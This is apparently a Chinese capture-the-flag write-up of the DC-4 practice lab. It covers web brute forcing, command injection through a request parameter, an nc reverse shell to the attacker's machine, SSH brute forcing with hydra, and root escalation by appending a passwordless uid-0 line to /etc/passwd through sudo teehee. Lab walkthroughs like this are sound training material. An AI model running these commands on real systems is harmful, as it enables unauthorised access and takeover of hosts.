DC-4

DC系列是专门构建的易受攻击的实验室，旨在获得渗透测试领域的经验，目前总共有9个靶机
关注微信公众号：网络安全101，公众号内回复**DC**，即可获取DC系列靶机镜像！

导入DC4靶机，网络适配器选择NAT模式，确保和kali处于同一IP段！！！

## 信息收集

> 确定主机IP地址

```bash
netdiscover -i eth0 -r 192.168.84.0/24
```

![image-20221215165801541](https://oss.maolin101.com/20250107035154676.png-101.webp)

> 扫描端口信息

![image-20221215165844978](https://oss.maolin101.com/20250107035154677.png-101.webp)

> nmap 鉴权

```bash
nmap 192.168.84.180 -sV -A -p 80 --script=vuln
```

![image-20221216122437915](https://oss.maolin101.com/20250107035154678.png-101.webp)

## WEB测试

> 访问靶机的80端口

![image-20221216122919992](https://oss.maolin101.com/20250107035154679.png-101.webp)

由网页提示用户可能是admin，针对admin用户进行暴力破解

> burp抓包请求包，进行暴力破解

密码为happy

![image-20221216124344011](https://oss.maolin101.com/20250107035154680.png-101.webp)

登录成功

![image-20221216124439890](https://oss.maolin101.com/20250107035154681.png-101.webp)

> 该页面，通过点击不同的功能按钮，得到不同的结果，猜测可能是执行了不同的命令

![image-20221216124637171](https://oss.maolin101.com/20250107035154682.png-101.webp)

> burp抓包发现，传参的是Linux命令，且与功能按钮点匹配

![image-20221216124759884](https://oss.maolin101.com/20250107035154683.png-101.webp)

> 修改传参点，会怎么样呢？

![image-20221216124853053](https://oss.maolin101.com/20250107035154684.png-101.webp)

> 执行反弹shell

目标上执行

```bash
nc+192.168.84.174+10086+-e+/bin/bash
192.168.84.174 -- 攻击机IP地址
10086 -- 攻击机的端口
```

![image-20221216125620309](https://oss.maolin101.com/20250107035154685.png-101.webp)

攻击机上进行端口的监听

![image-20221216125637116](https://oss.maolin101.com/20250107035154686.png-101.webp)

> 获取标准的shell

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
```

![image-20221216130114054](https://oss.maolin101.com/20250107035154687.png-101.webp)

## 提权

> 读取passwd文件发现有三个普通用户，然后分别进行了查看

![image-20221216130236320](https://oss.maolin101.com/20250107035154688.png-101.webp)

> 查看每个用户的家目录-在jim用户的家目录发现了old-password文件

![image-20221216130339541](https://oss.maolin101.com/20250107035154689.png-101.webp)

![image-20221216130525681](https://oss.maolin101.com/20250107035154690.png-101.webp)

> 由于开放了22端口，则对jim用户进行ssh服务爆破

```bash
hydra -l jim -P ./jim-oldpasswd.txt 192.168.84.180 ssh
jim-oldpasswd.txt为jim家目录下的old-passwords.bak文件
```

![image-20221216131448827](https://oss.maolin101.com/20250107035154691.png-101.webp)

> 登录jim用户

![image-20221216131704199](https://oss.maolin101.com/20250107035154692.png-101.webp)

> 在/var/mail下有封邮件

![image-20221216131934526](https://oss.maolin101.com/20250107035154693.png-101.webp)

得知charles用户的密码为^xHhA&hvim0y，登录成功

![image-20221216132430952](https://oss.maolin101.com/20250107035154694.png-101.webp)

> sudo -l
>
> 发现teehee 不需要root的用户密码

![image-20221216132728313](https://oss.maolin101.com/20250107035154695.png-101.webp)

> teehee

```bash
teehee是个小众的linux编辑器,如果有sudo权限,可以利用其来提权

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

例如：echo "xbxaq==0:0==:/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制，如果没有shadow条目，且passwd用户密码条目为空的时候，可以本地直接su空密码登录。
所以只需要执行su xbxaq就可以登录到xbxaq用户，这个用户因为uid为0，所以也是root权限
```

**passwd的格式：[⽤户名]：[密码]：[UID]：[GID]：[⾝份描述]：[主⽬录]：[登录shell]**

> 提权命令

```bash
 echo 'xbxaq::0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd
```

![image-20221216161831807](https://oss.maolin101.com/20250107035154696.png-101.webp)

![image-20221216161938563](https://oss.maolin101.com/20250107035154697.png-101.webp)